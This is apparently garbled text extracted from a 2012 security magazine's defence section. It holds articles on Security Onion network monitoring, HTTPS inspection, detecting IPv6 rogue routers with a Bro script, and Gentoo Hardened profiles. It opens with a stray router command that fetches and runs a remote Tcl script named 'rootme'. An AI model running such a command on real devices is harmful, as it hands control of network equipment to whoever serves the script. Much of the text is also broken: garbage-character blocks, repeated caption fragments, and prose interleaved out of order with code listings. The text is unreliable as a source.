router1# tclsh http://192.168.1.100/rootme

01/2012

DEFENSE

Easy Network

Security Monitoring with Security Onion

Intrusion Detection Systems monitor and analyze your network traffic for malicious threats. The problem is that they can be very difficult to configure and time consuming to install. Some take hours, days or even weeks to setup properly. The Security Onion IDS and Network Security Monitoring system changes all of that. Do you have 10 minutes? That is about how long it takes to setup and configure Security Onion.

180

H ackers and the malware that they create are getting much better at evading anti-virus programs and firewalls. So how do you detect

or even defend against these advanced threats? Intrusion Detection Systems (IDS) were created to

help detect the malicious activity that our networks are facing. The only problem is, they tend to throw a lot of false positive alerts and can get very overwhelming to monitor. Enter Network Security Monitoring (NSM). In basic terms, NSM software examines the alerts from IDS systems, events and full packet data, and then prioritizes these threats and present them in a graphical interface to be reviewed by an analyst. The analyst can then choose whether the alert needs to be acted on or if it can be dismissed. There are several commercial products out there that do this, but the free products from the open source community are very feature rich and capable. If you want a robust, cost effective and easy to use Intrusion Detection System (IDS) and Network Security Monitoring (NSM) platform, look no further than Doug Burks’ Security Onion (http://securityonion.b logspot.com/). Security Onion is one of my favorite security tools. Doug Burks did an amazing job pulling together many of the top open source IDS and NSM programs into a user friendly Linux distribution. It’s based on Ubuntu and

contains a ton of utilities including

Snort, Suricata, Sguil, Squert, Snorby, Xplico, Argus, Bro, Wireshark, and many others. Sounds complicated right? Well, Doug has done all the hard work in integrating these systems together into a very user friendly environment (see Figure 1). Run Security Onion on a system that has two network cards and you have a complete NSM/IDS system. One NIC connects to your network or the internet side of your traffic and records and monitors every packet that comes in or goes out of your system. The second NIC connects to your LAN and is used for management and system updates.

second NIC connects to your LAN and is used for management and system updates. Figure 1.

Figure 1. Security Onion Desktop

second NIC connects to your LAN and is used for management and system updates. Figure 1.

01/2012

DEFENSE

Inspecting Https Traffic On Gateways

In the past, security devices inspecting application content for attack patterns, misuse or malware, had been blind to encrypted traffic and because of this, encrypted protocols such as Hypertext Transfer Protocol Secure (HTTPS) have been a safe method used by attackers to bypass security inspection.

T hough reverse proxies and Web Server modules

have been there for long, they only inspect

incoming traffic e.g. connections made to

protected web servers in the organization. Inspecting outgoing traffic or traffic of connections made by users to outside world servers not protected by the device, had been on the wish lists. These days, devices come with the capability to inspect Secure Sockets Layer (SSL) based outgoing traffic, however there are some concerns by enabling such kind of inspection. In this article we cover some basics of SSL, the challenges in inspecting SSL traffic, and also see how Check Point’s HTTPS Inspection feature is able to inspect HTTPS traffic at the gateway. After reading this article you will know the pros and cons of enabling SSL inspection on a gateway.

Secure Sockets Layer (SSL) Basics

Protocols such as HTTP, SMTP, POP3 are plaintext i.e. data carried by these protocols can be read by anyone who is able to intercept the traffic while in transit. Since these protocols are widely used over the Internet, there is a need to secure them in order to protect users’ data. By protection of data we are looking at confidentiality, integrity and authentication.

����

���

����

����

�������

���

Figure 1. SSL providing security below application and above transport layers

186

security below application and above transport layers 186 Instead of building security measures in all the

Instead of building security measures in all the application protocols, the Secure Sockets Layer (SSL) protocol provides a secure channel below the application layer thereby making it easier than to make an application protocol a secure protocol. SSL is prominently used to protect the HTTP protocol making it HTTPS. Today it is also used to tunnel an entire network stack, creating a VPN. The SSL specification was developed by Netscape communications. After its version 3.0, a new Internet standard protocol was defined and called Transport Layer Security (TLS). The first version of TLS, version 1.0, was kind of an upgrade to SSL 3.0 with a few enhancements. Most web browsers and servers today support TLS 1.0, though versions 1.1 and 1.2 were also defined later, many browsers and applications are yet to support them. Throughout this article, we may commonly refer to both, SSL and TLS, as SSL.

How SSL/TLS Work

SSL provides:

Confidentiality – the data passing through SSL is encrypted using a symmetric encryption algorithm like DES, 3DES, RC4, AES etc.

symmetric encryption algorithm like DES, 3DES, RC4, AES etc. Figure 2. Browsers display company name in

Figure 2. Browsers display company name in green for Extended Validation certi�cates

01/2012

DEFENSE

Detecting IPv6

Rogue Router Incidents Using Bro NSM

As IPv6 migration slowly gains momentum, situations where administrators responsible for deployment of network equipment have very poor knowledge and non-existent operational experience of the new protocol are unavoidable.

T hese situations are bound to cause information security events of varying gravity. We use the term information security here as defined broadly

by the CIA –triad, CIA for confidentiality, integrity and availability. A well-known issue, the rogue router attack against IPv6 protocol enabled network, exploits the router advertisement (RA) functionality of ICMPv6 protocol.

A rogue router incident can be caused by malicious

attackers or through poor deployment and configuration

of IPv6 capable equipment. Rogue router attack can be

used to break the confidentiality of the data, availability

of Internet access from local area network (LAN) and

data integrity e.g. in form of data manipulation by the rogue router. Thus affecting all three components of the CIA – triad In this article we depict one method for detecting them using open source Bro NSM. Bro Network Security Monitor (Bro NSM) is a flexible open source network analysis framework that is freely distributed under BSD license.

Introduction

Internet Protocol version 6 (IPv6) has been a long time

coming. As the protocol is making its entrance several security risks of varying criticality are known to exist. However, the amount of skilled personnel needed to assure the security of IPv6 network deployment as well as awareness of the said risks remains woefully low. Here we concentrate on the one particular issue that is caused by a particular ICMPv6 message in

a particular configuration and setting. The ICMPv6

is a much more critical component of the IPv6 protocol than its predecessor ICMP was for Internet Protocol version 4 (IPv4). For example, in IPv6, the functionality that was previously handled by the Address Resolution Protocol (ARP) is now being taken up by the Internet Control Message Protocol version 6 (ICMPv6). Total filtering and blocking of all ICMP

traffic did not cripple IPv4, but in contrast disabling the ICMPv6 will discernibly hamper the functionality

of IPv6. ICMPv6 runs on top of IPv6, having its own

Listing 1. Partial icmp. bro listing of a development version

event icmp_router_advertisement(c: connection, icmp: icmp_conn)

{

print_log(c, icmp, "");

if ( |router_whitelist| == 0 || icmp$orig_h in router_whitelist )

return;

NOTICE([$note=ICMPRogueRouter, $msg=fmt("rogue router advertisement from %s", icmp$orig_h)]);

}

192

note = ICMPRogueRouter , $ msg = fmt ( "rogue router advertisement from %s" , icmp

01/2012

196

DEFENSE

The Gentoo Hardened Project:

Or How to Minimize Exploits Risks

If you are reading this, then you might know what Gentoo Linux is. If not, Gentoo Linux is a Linux distribution with plenty of years of history and development. It was born on October 4th, 1999 by Daniel Robbins.

G entoo’s approach to Linux is evidenced in its philosophy [1], from there it derives the fact that optimization, flexibility and choices are the

keystones of the distribution. Gentoo gives users the tools needed for them to shape their Gentoo installation to their liking all the while building and compiling software specifically for their hardware architecture, not relying on pre-built binaries compiled by someone

else. That is one of the reasons why you will hear users and developers, say that Gentoo is a meta-distribution because the distribution provides exciting tools that allow users, using the same base system, to build highly secure servers, neat desktops, embedded solutions or even a special VDR system. Gentoo achieves this degree of flexibility through its software distribution system, called Portage [3]. This technology allows the user to manage the local collection of scripts, used by the package manager,

Besides USE flags, Portage provides something called system profiles. A profile, for short, is a set of default values (e.g. predefined) for various important environment variables that are used when building packages. They set things like default CFLAGS, USE flags, arch keywords and set a certain range of acceptable versions for important packages. You may think of profiles as recommended settings for building and maintaining a system for a specific purpose (see Listing 1 for a list of default system profiles). Before getting into the nuts and bolts of how the USE flags and profiles are related to the Gentoo Hardened Project, let’s take a look at what it is and what does it offers.

 

Listing 1. Default system pro�les in a Gentoo system

kafka x86 # eselect profile list

to

install, update or delete software from the system.

Available profile symlink targets:

This collection is called Portage Tree and has over 10,000 packages ready for the user’s enjoyment. Since the distribution is based on source packages, Portage can offer users great detail in the choices they can make when building software for the target machine. This is achieved by means of a special mechanism called USE flags [3]. USE flags are keywords that can be specified when building software to select/deselect which features a package will be built with.

For example, say you want to install a server without

[1]

default/linux/x86/10.0

[2]

default/linux/x86/10.0/desktop

[3]

default/linux/x86/10.0/desktop/gnome

[4]

default/linux/x86/10.0/desktop/kde

[5]

default/linux/x86/10.0/developer

[6]

default/linux/x86/10.0/server

[7]

hardened/linux/x86

[8]

hardened/linux/x86/selinux

[9]

selinux/2007.0/x86

[10] selinux/2007.0/x86/hardened [11] selinux/v2refpolicy/x86 [12] selinux/v2refpolicy/x86/desktop [13] selinux/v2refpolicy/x86/developer [14] selinux/v2refpolicy/x86/hardened

a

graphical user interface. It wouldn’t make sense

to

build software with features that use the X server

or bindings to Gnome libraries. Portage gives you

the ability to (globally, per-package, per-slot or per- version) disable all of those features for all packages

[15] selinux/v2refpolicy/x86/server

to

be merged into the system.

features for all packages [ 15 ] selinux / v2refpolicy / x86 / server to be

01/2012

��� � �������������� � � � � � � � �� �� ���
��� � �������������� � � � � � � � �� �� ���
� � � � � � � �� �� ��� �� �� �� �� ��
��
��
���
��
��
��
��
��
�� �� � � � � � � � � �������������� �
��������������
��������������
� ������������������������
� ������������������������
�������������������������������������������������������������������������������������������������������
����������������������������������������������������������������������������������������������������������������������
�������������������������������������������������������������������������������������������������������������������
�����������������������������������������������������������������������������������������������������������
�������������������������������������������������������������������������������������������������������������
� ���� � ���� �